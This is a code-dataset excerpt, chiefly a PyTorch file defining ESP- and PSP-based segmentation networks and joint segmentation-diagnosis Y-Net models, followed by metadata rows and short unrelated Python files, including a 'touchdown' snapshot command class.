        self.act = nn.ReLU(True)  # nn.PReLU(nOut)

    def forward(self, input):
        feat = torch.cat([self.conv(input), self.pool(input)], 1)
        return self.act(self.bn(feat))
class BasicResidualBlock(nn.Module):
    """Two 3x3 conv blocks (CBR then CB) with an identity skip connection.

    The identity add requires nIn == nOut. `prob` is kept for interface
    compatibility; the dropout it configured is disabled.
    """

    def __init__(self, nIn, nOut, prob=0.03):
        super().__init__()
        self.c1 = CBR(nIn, nOut, 3, 1)
        self.c2 = CB(nOut, nOut, 3, 1)
        self.act = nn.ReLU(True)  # nn.PReLU(nOut)
        # self.drop = nn.Dropout2d(p=prob)

    def forward(self, input):
        residual = self.c2(self.c1(input))
        # skip connection, then in-place ReLU
        return self.act(input + residual)
class DownSamplerA(nn.Module):
    """Halve spatial size with a single stride-2 CBR block."""

    def __init__(self, nIn, nOut):
        super().__init__()
        self.conv = CBR(nIn, nOut, 3, 2)

    def forward(self, input):
        return self.conv(input)
class BR(nn.Module):
    """BatchNorm2d followed by ReLU (no convolution)."""

    def __init__(self, nOut):
        super().__init__()
        self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
        self.act = nn.ReLU(True)  # nn.PReLU(nOut)

    def forward(self, input):
        return self.act(self.bn(input))
class CDilated(nn.Module):
    """Dilated bias-free Conv2d whose padding preserves spatial size at stride 1."""

    def __init__(self, nIn, nOut, kSize, stride=1, d=1):
        super().__init__()
        pad = int((kSize - 1) / 2) * d
        self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride,
                              padding=(pad, pad), bias=False, dilation=d)

    def forward(self, input):
        return self.conv(input)
class CDilated1(nn.Module):
    """Dilated Conv2d followed by a BR (BatchNorm + ReLU) block."""

    def __init__(self, nIn, nOut, kSize, stride=1, d=1):
        super().__init__()
        pad = int((kSize - 1) / 2) * d
        self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride,
                              padding=(pad, pad), bias=False, dilation=d)
        self.br = BR(nOut)

    def forward(self, input):
        return self.br(self.conv(input))
class DilatedParllelResidualBlockB(nn.Module):
    """ESP-style block: 1x1 channel reduction, five parallel dilated 3x3
    convolutions (d = 1, 2, 4, 8, 16) whose outputs are hierarchically
    summed, concatenated back to nOut channels, and added to the input.

    NOTE(review): the residual add `input + combine` requires nIn == nOut;
    `prob` is accepted but unused (the dropout it configured is commented out).
    """

    def __init__(self, nIn, nOut, prob=0.03):
        super().__init__()
        n = int(nOut / 5)   # channels per dilated branch
        n1 = nOut - 4 * n   # first branch absorbs the remainder
        self.c1 = C(nIn, n, 1, 1)  # 1x1 reduction
        self.d1 = CDilated(n, n1, 3, 1, 1)
        self.d2 = CDilated(n, n, 3, 1, 2)
        self.d4 = CDilated(n, n, 3, 1, 4)
        self.d8 = CDilated(n, n, 3, 1, 8)
        self.d16 = CDilated(n, n, 3, 1, 16)
        self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
        self.act = nn.ReLU(True)  # nn.PReLU(nOut)
        # self.drop = nn.Dropout2d(p=prob)

    def forward(self, input):
        output1 = self.c1(input)
        d1 = self.d1(output1)
        d2 = self.d2(output1)
        d4 = self.d4(output1)
        d8 = self.d8(output1)
        d16 = self.d16(output1)
        # hierarchical feature fusion: each sum widens the receptive field
        add1 = d2
        add2 = add1 + d4
        add3 = add2 + d8
        add4 = add3 + d16
        combine = torch.cat([d1, add1, add2, add3, add4], 1)
        combine_in_out = input + combine  # identity residual
        output = self.bn(combine_in_out)
        # output = self.drop(output)
        output = self.act(output)
        return output
class DilatedParllelResidualBlockB1(nn.Module):
    """Variant of the ESP block using a 3x3 reduction and only four dilated
    branches (d = 1, 2, 4, 8) in the forward pass.

    NOTE(review): self.d16 is constructed but never used in forward (the
    call is commented out), so its parameters are dead weight; it is kept
    here so pretrained state_dicts still load.
    The residual add requires nIn == nOut; `prob` is unused.
    """

    def __init__(self, nIn, nOut, prob=0.03):
        super().__init__()
        n = int(nOut / 4)   # channels per dilated branch
        n1 = nOut - 3 * n   # first branch absorbs the remainder
        self.c1 = C(nIn, n, 3, 1)  # 3x3 reduction
        self.d1 = CDilated(n, n1, 3, 1, 1)
        self.d2 = CDilated(n, n, 3, 1, 2)
        self.d4 = CDilated(n, n, 3, 1, 4)
        self.d8 = CDilated(n, n, 3, 1, 8)
        self.d16 = CDilated(n, n, 3, 1, 16)
        self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
        self.act = nn.ReLU(True)  # nn.PReLU(nOut)
        # self.drop = nn.Dropout2d(p=prob)

    def forward(self, input):
        output1 = self.c1(input)
        d1 = self.d1(output1)
        d2 = self.d2(output1)
        d4 = self.d4(output1)
        d8 = self.d8(output1)
        # d16 = self.d16(output1)
        # hierarchical feature fusion across the four active branches
        add1 = d2
        add2 = add1 + d4
        add3 = add2 + d8
        # add4 = add3 + d16
        combine = torch.cat([d1, add1, add2, add3], 1)
        combine_in_out = input + combine  # identity residual
        output = self.bn(combine_in_out)
        # output = self.drop(output)
        output = self.act(output)
        return output
class PSPDec(nn.Module):
    """PSP-style decoder branch: adaptive average pool to `downSize`,
    1x1 conv + BN + ReLU, then bilinear upsample to `upSize`."""

    def __init__(self, nIn, nOut, downSize, upSize=48):
        super().__init__()
        stages = [
            nn.AdaptiveAvgPool2d(downSize),
            nn.Conv2d(nIn, nOut, 1, bias=False),
            nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3),
            nn.ReLU(True),  # nn.PReLU(nOut)
            nn.Upsample(size=upSize, mode='bilinear'),
        ]
        self.features = nn.Sequential(*stages)

    def forward(self, x):
        return self.features(x)
class ResNetC1(nn.Module):
    '''
    Segmentation model with ESP as the encoding block.
    This is the same as in stage 1
    '''
    # NOTE(review): the spatial sizes in the PSPDec arguments (192/96/48 etc.)
    # are hand-tuned to a 384x384 input -- confirm before feeding other sizes.

    def __init__(self, classes):
        """classes -- number of segmentation classes (output channels)."""
        super().__init__()
        # encoder level 1: 7x7 stride-2 stem
        self.level1 = CBR(3, 16, 7, 2) # 384 x 384
        # pyramid pooling branches for the finest decoder stage
        self.p01 = PSPDec(16 + classes, classes, 160, 192)
        self.p02 = PSPDec(16 + classes, classes, 128, 192)
        self.p03 = PSPDec(16 + classes, classes, 96, 192)
        self.p04 = PSPDec(16 + classes, classes, 72, 192)
        # final per-pixel classifier at the finest resolution
        self.class_0 = nn.Sequential(
            nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True), # nn.PReLU(classes),
            # nn.Dropout2d(.1),
            nn.Conv2d(classes, classes, 7, padding=3, bias=False)
        )
        # encoder level 2: downsample + two ESP blocks
        self.level2 = DownSamplerA(16, 128)
        self.level2_0 = DilatedParllelResidualBlockB1(128, 128)
        self.level2_1 = DilatedParllelResidualBlockB1(128, 128)  # 512 x 256
        # pyramid pooling branches for the mid decoder stage
        self.p10 = PSPDec(8 + 256, 64, 80, 96)
        self.p20 = PSPDec(8 + 256, 64, 64, 96)
        self.p30 = PSPDec(8 + 256, 64, 48, 96)
        self.p40 = PSPDec(8 + 256, 64, 36, 96)
        self.class_1 = nn.Sequential(
            nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True), # nn.PReLU(classes),
            # nn.Dropout2d(.1),
            nn.Conv2d(classes, classes, 1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True)
        )
        self.br_2 = BR(256)
        # encoder levels 3/4: deeper ESP blocks at 1/8 resolution
        self.level3_0 = DownSamplerA(256, 256)
        self.level3_1 = DilatedParllelResidualBlockB1(256, 256, 0.3)
        self.level3_2 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 256 x 128
        self.level4_1 = DilatedParllelResidualBlockB1(256, 256, 0.3)
        self.level4_2 = DilatedParllelResidualBlockB1(256, 256, 0.3)
        self.level4_3 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 128 x 64
        # pyramid pooling branches for the coarsest decoder stage
        self.p1 = PSPDec(512, 128, 40)
        self.p2 = PSPDec(512, 128, 32)
        self.p3 = PSPDec(512, 128, 24)
        self.p4 = PSPDec(512, 128, 18)
        self.br_4 = BR(512)
        self.classifier = nn.Sequential(
            nn.Conv2d(512 + 4 * 128, 128, 1, padding=0, bias=False),
            nn.BatchNorm2d(128, momentum=0.95, eps=1e-3),
            nn.ReLU(True), # nn.PReLU(classes),
            # nn.Dropout2d(.1),
            nn.Conv2d(128, classes, 3, padding=1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True),
            nn.Conv2d(classes, classes, 1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True)
        )
        # C(320, classes, 7, 1)
        self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear')
        self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear')
        self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear')

    def forward(self, input1):
        """Encode at three scales, decode coarse-to-fine with PSP branches,
        and return per-pixel class scores at half the input resolution
        followed by a final 2x upsample."""
        # input1 = self.cmlrn(input)
        output0 = self.level1(input1)
        output1_0 = self.level2(output0)
        output1 = self.level2_0(output1_0)
        output1 = self.level2_1(output1)
        # concat skip from the downsampler with the block output
        output1 = self.br_2(torch.cat([output1_0, output1], 1))
        output2_0 = self.level3_0(output1)
        output2 = self.level3_1(output2_0)
        output2 = self.level3_2(output2)
        output3 = self.level4_1(output2)
        output3 = self.level4_2(output3)
        output3 = self.level4_3(output3)
        output3 = self.br_4(torch.cat([output2_0, output3], 1))
        # coarsest decoder stage with pyramid pooling
        output3 = self.classifier(
            torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1))
        output3 = self.upsample_3(output3)
        # mid decoder stage: fuse with level-2 features
        combine_up_23 = torch.cat([output3, output1], 1)
        output23_hook = self.class_1(torch.cat(
            [combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23),
             self.p40(combine_up_23)], 1))
        output23_hook = self.upsample_2(output23_hook)
        # finest decoder stage: fuse with stem features
        combine_up = torch.cat([output0, output23_hook], 1)
        output0_hook = self.class_0(torch.cat(
            [combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1))
        # output3 = output2_0 + output3
        # classifier = self.classifier(output3)
        classifier = self.upsample_1(output0_hook)
        return classifier
class ResNetC1_YNet(nn.Module):
    '''
    Jointly learning the segmentation and classification with ESP as encoding blocks.

    The segmentation path replays the children of a pre-trained ResNetC1 by
    positional index; the diagnostic path branches off the deepest encoder
    features and ends in a small classifier head.
    '''

    def __init__(self, classes, diagClasses, segNetFile=None):
        """classes: number of segmentation classes; diagClasses: number of
        diagnosis classes; segNetFile: optional path to pre-trained ResNetC1
        weights (loaded with torch.load)."""
        super().__init__()
        # diagnostic branch: two downsampling stages with dilated residual blocks
        self.level4_0 = DownSamplerA(512, 128)
        self.level4_1 = DilatedParllelResidualBlockB1(128, 128, 0.3)
        self.level4_2 = DilatedParllelResidualBlockB1(128, 128, 0.3)
        self.br_con_4 = BR(256)
        self.level5_0 = DownSamplerA(256, 64)
        self.level5_1 = DilatedParllelResidualBlockB1(64, 64, 0.3)
        self.level5_2 = DilatedParllelResidualBlockB1(64, 64, 0.3)
        self.br_con_5 = BR(128)
        self.global_Avg = nn.AdaptiveAvgPool2d(1)
        self.fc1 = nn.Linear(128, 64)
        self.fc2 = nn.Linear(64, diagClasses)
        # segmentation model
        self.segNet = ResNetC1(classes)
        if segNetFile is not None:
            print('Loading pre-trained segmentation model')
            self.segNet.load_state_dict(torch.load(segNetFile))
        # NOTE(review): this assignment shadows nn.Module.modules(); calling
        # model.modules() on this class therefore no longer works -- confirm
        # nothing downstream relies on it. The list order also depends on the
        # declaration order inside ResNetC1.__init__, so the numeric indices
        # in forward() are tightly coupled to that class.
        self.modules = []
        for i, m in enumerate(self.segNet.children()):
            self.modules.append(m)

    def forward(self, input1):
        """Return (segmentation score map, diagnosis logits) for a batch."""
        # --- segmentation path: replay ResNetC1's forward via child indices ---
        output0 = self.modules[0](input1)
        output1_0 = self.modules[6](output0)  # downsample
        output1 = self.modules[7](output1_0)
        output1 = self.modules[8](output1)
        output1 = self.modules[14](torch.cat([output1_0, output1], 1))
        output2_0 = self.modules[15](output1)  # downsample
        output2 = self.modules[16](output2_0)
        output2 = self.modules[17](output2)
        output3 = self.modules[18](output2)
        output3 = self.modules[19](output3)
        output3 = self.modules[20](output3)
        # deepest features; also the take-off point of the diagnostic branch
        output3_hook = self.modules[25](torch.cat([output2_0, output3], 1))
        output3 = self.modules[26](
            torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook),
                       self.modules[23](output3_hook), self.modules[24](output3_hook)], 1))
        output3 = self.modules[29](output3)
        combine_up_23 = torch.cat([output3, output1], 1)
        output23_hook = self.modules[13](torch.cat(
            [combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23),
             self.modules[11](combine_up_23),
             self.modules[12](combine_up_23)], 1))
        output23_hook = self.modules[28](output23_hook)
        combine_up = torch.cat([output0, output23_hook], 1)
        output0_hook = self.modules[5](torch.cat(
            [combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up),
             self.modules[4](combine_up)], 1))
        # segmentation classsifier
        classifier = self.modules[27](output0_hook)
        # diagnostic branch
        l5_0 = self.level4_0(output3_hook)
        l5_1 = self.level4_1(l5_0)
        l5_2 = self.level4_2(l5_1)
        l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1))
        l6_0 = self.level5_0(l5_con)
        l6_1 = self.level5_1(l6_0)
        l6_2 = self.level5_2(l6_1)
        l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1))
        glbAvg = self.global_Avg(l6_con)
        flatten = glbAvg.view(glbAvg.size(0), -1)
        fc1 = self.fc1(flatten)
        diagClass = self.fc2(fc1)
        return classifier, diagClass
class ResNetD1(nn.Module):
    '''
    Segmentation model with RCB as encoding blocks.
    This is the same as in Stage 1
    '''

    def __init__(self, classes):
        """classes: number of output segmentation classes."""
        super().__init__()
        self.level1 = CBR(3, 16, 7, 2) # 384 x 384
        # pyramid pooling decoders for the shallowest merge stage
        self.p01 = PSPDec(16 + classes, classes, 160, 192)
        self.p02 = PSPDec(16 + classes, classes, 128, 192)
        self.p03 = PSPDec(16 + classes, classes, 96, 192)
        self.p04 = PSPDec(16 + classes, classes, 72, 192)
        self.class_0 = nn.Sequential(
            nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True),
            nn.Conv2d(classes, classes, 7, padding=3, bias=False)
        )
        self.level2 = DownSamplerA(16, 128)
        self.level2_0 = BasicResidualBlock(128, 128)
        self.level2_1 = BasicResidualBlock(128, 128) # 512 x 256
        # pyramid pooling decoders for the mid-level merge stage
        self.p10 = PSPDec(8 + 256, 64, 80, 96)
        self.p20 = PSPDec(8 + 256, 64, 64, 96)
        self.p30 = PSPDec(8 + 256, 64, 48, 96)
        self.p40 = PSPDec(8 + 256, 64, 36, 96)
        self.class_1 = nn.Sequential(
            nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True),
            nn.Conv2d(classes, classes, 1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True)
        )
        self.br_2 = BR(256)
        # deeper encoder stages built from residual convolutional blocks
        self.level3_0 = DownSamplerA(256, 256)
        self.level3_1 = BasicResidualBlock(256, 256, 0.3)
        self.level3_2 = BasicResidualBlock(256, 256, 0.3)
        self.level4_1 = BasicResidualBlock(256, 256, 0.3)
        self.level4_2 = BasicResidualBlock(256, 256, 0.3)
        self.level4_3 = BasicResidualBlock(256, 256, 0.3)
        # pyramid pooling at the deepest scale
        self.p1 = PSPDec(512, 128, 40)
        self.p2 = PSPDec(512, 128, 32)
        self.p3 = PSPDec(512, 128, 24)
        self.p4 = PSPDec(512, 128, 18)
        self.br_4 = BR(512)
        self.classifier = nn.Sequential(
            nn.Conv2d(512 + 128 * 4, 128, 1, padding=0, bias=False),
            nn.BatchNorm2d(128, momentum=0.95, eps=1e-3),
            nn.ReLU(True),
            nn.Conv2d(128, classes, 3, padding=1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True),
            nn.Conv2d(classes, classes, 1, bias=False),
            nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
            nn.ReLU(True)
        )
        self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear')
        self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear')
        self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear')

    def forward(self, input1):
        """Encode at three scales, then decode with PSP blocks and 2x
        upsampling; returns the dense class-score map."""
        # input1 = self.cmlrn(input)
        output0 = self.level1(input1)
        output1_0 = self.level2(output0)
        output1 = self.level2_0(output1_0)
        output1 = self.level2_1(output1)
        output1 = self.br_2(torch.cat([output1_0, output1], 1))
        output2_0 = self.level3_0(output1)
        output2 = self.level3_1(output2_0)
        output2 = self.level3_2(output2)
        output3 = self.level4_1(output2)
        output3 = self.level4_2(output3)
        output3 = self.level4_3(output3)
        output3 = self.br_4(torch.cat([output2_0, output3], 1))
        output3 = self.classifier(
            torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1))
        output3 = self.upsample_3(output3)
        combine_up_23 = torch.cat([output3, output1], 1)
        output23_hook = self.class_1(torch.cat(
            [combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23),
             self.p40(combine_up_23)], 1))
        output23_hook = self.upsample_2(output23_hook)
        # NOTE(review): here the concat order is [output23_hook, output0],
        # while ResNetC1.forward and ResNetD1_YNet.forward use
        # [output0, output23_hook]. Channel order feeds directly into the
        # class_0 convolution weights -- confirm this asymmetry is intended.
        combine_up = torch.cat([output23_hook, output0], 1)
        output0_hook = self.class_0(torch.cat(
            [combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1))
        classifier = self.upsample_1(output0_hook)
        return classifier
class ResNetD1_YNet(nn.Module):
    '''
    Jointly learning the segmentation and classification with RCB as encoding blocks.

    Same Y-Net structure as ResNetC1_YNet, but the segmentation backbone is a
    (possibly pre-trained) ResNetD1 whose children are replayed by index.
    '''

    def __init__(self, classes, diagClasses, segNetFile=None):
        """classes: segmentation classes; diagClasses: diagnosis classes;
        segNetFile: optional path to pre-trained ResNetD1 weights."""
        super().__init__()
        # diagnostic branch
        self.level4_0 = DownSamplerA(512, 128)  # 24x24
        self.level4_1 = BasicResidualBlock(128, 128, 0.3)
        self.level4_2 = BasicResidualBlock(128, 128, 0.3)
        self.br_con_4 = BR(256)
        self.level5_0 = DownSamplerA(256, 64)  # 12x12
        self.level5_1 = BasicResidualBlock(64, 64, 0.3)
        self.level5_2 = BasicResidualBlock(64, 64, 0.3)
        self.br_con_5 = BR(128)
        self.global_Avg = nn.AdaptiveAvgPool2d(1)
        self.fc1 = nn.Linear(128, 64)
        self.fc2 = nn.Linear(64, diagClasses)
        self.segNet = ResNetD1(classes)  # 384 x 384
        if segNetFile is not None:
            print('Loading segmentation pre-trained model')
            self.segNet.load_state_dict(torch.load(segNetFile))
        # NOTE(review): shadows nn.Module.modules(); forward() below depends
        # on the exact declaration order inside ResNetD1.__init__.
        self.modules = []
        for i, m in enumerate(self.segNet.children()):
            self.modules.append(m)
            # print(i, m)

    def forward(self, input1):
        """Return (segmentation score map, diagnosis logits) for a batch."""
        # --- segmentation path: replay ResNetD1's forward via child indices ---
        output0 = self.modules[0](input1)
        output1_0 = self.modules[6](output0)  # downsample
        output1 = self.modules[7](output1_0)
        output1 = self.modules[8](output1)
        output1 = self.modules[14](torch.cat([output1_0, output1], 1))
        output2_0 = self.modules[15](output1)  # downsample
        output2 = self.modules[16](output2_0)
        output2 = self.modules[17](output2)
        output3 = self.modules[18](output2)
        output3 = self.modules[19](output3)
        output3 = self.modules[20](output3)
        output3_hook = self.modules[25](torch.cat([output2_0, output3], 1))
        output3 = self.modules[26](
            torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook),
                       self.modules[23](output3_hook), self.modules[24](output3_hook)], 1))
        output3 = self.modules[29](output3)
        combine_up_23 = torch.cat([output3, output1], 1)
        output23_hook = self.modules[13](torch.cat(
            [combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23),
             self.modules[11](combine_up_23),
             self.modules[12](combine_up_23)], 1))
        output23_hook = self.modules[28](output23_hook)
        # NOTE(review): concat order [output0, output23_hook] differs from
        # ResNetD1.forward, which uses [output23_hook, output0] at this stage
        # -- with loaded ResNetD1 weights the class_0 channels would be
        # swapped; confirm which order matches training.
        combine_up = torch.cat([output0, output23_hook], 1)
        output0_hook = self.modules[5](torch.cat(
            [combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up),
             self.modules[4](combine_up)], 1))
        # segmentation classsifier
        classifier = self.modules[27](output0_hook)
        # diagnostic branch
        l5_0 = self.level4_0(output3_hook)
        l5_1 = self.level4_1(l5_0)
        l5_2 = self.level4_2(l5_1)
        l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1))
        l6_0 = self.level5_0(l5_con)
        l6_1 = self.level5_1(l6_0)
        l6_2 = self.level5_2(l6_1)
        l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1))
        glbAvg = self.global_Avg(l6_con)
        flatten = glbAvg.view(glbAvg.size(0), -1)
        fc1 = self.fc1(flatten)
        diagClass = self.fc2(fc1)
        return classifier, diagClass
| 35.412141 | 121 | 0.591664 | 21,721 | 0.979836 | 0 | 0 | 0 | 0 | 0 | 0 | 1,790 | 0.080747 |
5e16f149874edd109b6f8b910bb8ac81d76a5978 | 239 | py | Python | src/ast/socps/__init__.py | cvxgrp/qcml | ff5e378cfeeebcf3f85a6e30c3449585f9af869f | [
"BSD-2-Clause-FreeBSD"
] | 26 | 2015-02-06T02:59:17.000Z | 2021-11-15T18:13:27.000Z | src/ast/socps/__init__.py | cvxgrp/qcml | ff5e378cfeeebcf3f85a6e30c3449585f9af869f | [
"BSD-2-Clause-FreeBSD"
] | 6 | 2015-06-14T04:43:43.000Z | 2019-10-27T11:03:30.000Z | src/ast/socps/__init__.py | cvxgrp/qcml | ff5e378cfeeebcf3f85a6e30c3449585f9af869f | [
"BSD-2-Clause-FreeBSD"
] | 6 | 2015-03-14T07:40:56.000Z | 2019-12-30T23:11:36.000Z | """ Technically, every problem is a program; but not every program is a
problem.
This distinction only really matters if we introduce nodes for For loops
and whatnot.
Then the problem has 'program-like' constructs.
"""
| 26.555556 | 76 | 0.715481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 238 | 0.995816 |
5e18d5ae2551f5b9932d20a83fb9244f3bfde336 | 1,526 | py | Python | touchdown/goals/snapshot.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 14 | 2015-01-05T18:18:04.000Z | 2022-02-07T19:35:12.000Z | touchdown/goals/snapshot.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 106 | 2015-01-06T00:17:13.000Z | 2019-09-07T00:35:32.000Z | touchdown/goals/snapshot.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 5 | 2015-01-30T10:18:24.000Z | 2022-02-07T19:35:13.000Z | # Copyright 2015 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from touchdown.core import errors
from touchdown.core.goals import Goal, register
class Snapshot(Goal):

    """Take a named snapshot of a database resource."""

    name = "snapshot"

    def get_plan_class(self, resource):
        # Fall back to the "null" plan when the resource has no
        # snapshot-specific plan registered.
        return resource.meta.get_plan("snapshot") or resource.meta.get_plan("null")

    @classmethod
    def setup_argparse(cls, parser):
        # Positional arguments: which resource to snapshot and the snapshot name.
        for name, metavar, help_text in (
                ("target", "TARGET", "The resource to snapshot"),
                ("snapshot_name", "TO", "The snapshot name")):
            parser.add_argument(name, metavar=metavar, type=str, help=help_text)

    def execute(self, target, snapshot_name):
        # Collect all snapshot-capable resources and dispatch to the one named.
        candidates = self.collect_as_dict("snapshot")
        if target not in candidates:
            raise errors.Error('No such resource "{}"'.format(target))
        candidates[target].snapshot(snapshot_name)


register(Snapshot)
| 31.791667 | 81 | 0.692005 | 842 | 0.551769 | 0 | 0 | 287 | 0.188073 | 0 | 0 | 730 | 0.478375 |
5e18e6288b6b07a784cee38e7f2cbe8ce2280ae9 | 548 | py | Python | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 4 | 2018-12-16T15:06:20.000Z | 2022-03-09T11:18:11.000Z | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 1 | 2018-10-12T07:32:13.000Z | 2018-10-12T07:32:13.000Z | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 2 | 2018-10-12T06:58:08.000Z | 2020-03-19T10:44:34.000Z | #!/bin/bash
# -*- coding: utf-8 -*-
# Crawler Main
#
# Author : Tau Woo
# Date : 2018-07-19
from do.crawler import Do
from sys import argv
if __name__ == "__main__":
    # Crawler entry point: run the crawler named on the command line,
    # defaulting to the "sample" configuration when no name is given.
    name = argv[1] if len(argv) > 1 else "sample"
    Do(name).do()
    # Debug helper: dump crawled data from redis into an xlsx file.
    # Do(name).rds_to_xlsx("{}.xlsx".format(name), name)
| 22.833333 | 71 | 0.645985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 354 | 0.645985 |
5e19d0ee97555a2535e07c68aeeb0e5f3e4eecae | 1,660 | py | Python | gui_showcase/main.py | maliozer/rodnet | 423a718f9ab5f2cc132f0f8a79dc1423704dbd3b | [
"MIT"
] | 1 | 2020-09-06T20:54:06.000Z | 2020-09-06T20:54:06.000Z | gui_showcase/main.py | maliozer/rodnet | 423a718f9ab5f2cc132f0f8a79dc1423704dbd3b | [
"MIT"
] | null | null | null | gui_showcase/main.py | maliozer/rodnet | 423a718f9ab5f2cc132f0f8a79dc1423704dbd3b | [
"MIT"
] | null | null | null | from tkinter import *
from PIL import ImageTk, Image
from tkinter import filedialog
# --- main window ---
gui = Tk()
gui.title('RODNET | Inzva AI Project Showcase v0.1')

# Logo. (Translated from Turkish: "we can add the logo variable at the very
# end; this may stay as a comment.")
logo_image_path = Image.open('./images/inzva_logo.png')
inzva_logo = ImageTk.PhotoImage(logo_image_path)
# NOTE(review): .pack() returns None, so inzva_logo_label is always None.
inzva_logo_label = Label(image=inzva_logo).pack()

# window size
canvas = Canvas(gui, width=800, height=500)
canvas.pack()

# title
rodnet_label = Label(gui, text="RODNET Robust Object Detection Beta Showcase: ",font=("Helvetica", 12)).pack()
def change(image_new):
    # Swap the picture shown by the module-level canvas item (image_id);
    # called after the user picks a new file in open() below.
    canvas.itemconfig(image_id, image=image_new)
def open():
    """Ask the user for an image file and show it on the canvas.

    NOTE(review): this shadows the builtin ``open()``; renaming would also
    require changing the Button command defined below, so it is kept as-is.

    Side effects: sets ``gui.filename`` and rebinds the module-global
    ``image2`` -- the PhotoImage must stay referenced at module scope,
    otherwise Tk garbage-collects it and the canvas goes blank.
    """
    gui.filename = filedialog.askopenfilename(initialdir="/", title="Select a File", filetypes=(("png files", "*.png"), ("all files", "*.*")))
    if gui.filename:
        global image2
        print(gui.filename)  # image path on local pc
        # call predictor with (gui.filename)
        image2_open = Image.open(gui.filename)
        if image2_open.width > 800:
            # Downscale large images by half so they fit the 800x500 canvas.
            w = int(image2_open.width * 0.5)
            h = int(image2_open.height * 0.5)
            # NOTE(review): Image.ANTIALIAS was removed in Pillow 10 (use
            # Image.LANCZOS there) -- confirm the installed Pillow version.
            image2_open = image2_open.resize((w, h), Image.ANTIALIAS)
        image2 = ImageTk.PhotoImage(image2_open)
        # update canvas
        change(image2)
    else:
        print("No selection")
# Default canvas image (the RODNET logo) shown before any file is chosen.
image_showcase = PhotoImage(file="./images/rodnet_logo.png")
#offset = [int((800 - image_showcase.width()) /2)]
image_id = canvas.create_image(0, 10, anchor='nw', image=image_showcase)

# File picker: the Button calls open() defined above (which shadows the builtin).
open_label = Label(gui, text="Select the image: ").pack()
open_button = Button(gui, text="Open File", command=open).pack()
gui.mainloop() | 29.122807 | 141 | 0.678313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 434 | 0.261446 |
5e1bf0067d53075a4199123df0352e8002b66c4e | 7,233 | py | Python | heap_md.py | sorrento/sdopt-tearing | f726e9abbb2d47f93aac32e54949051d3968664b | [
"BSD-3-Clause"
] | null | null | null | heap_md.py | sorrento/sdopt-tearing | f726e9abbb2d47f93aac32e54949051d3968664b | [
"BSD-3-Clause"
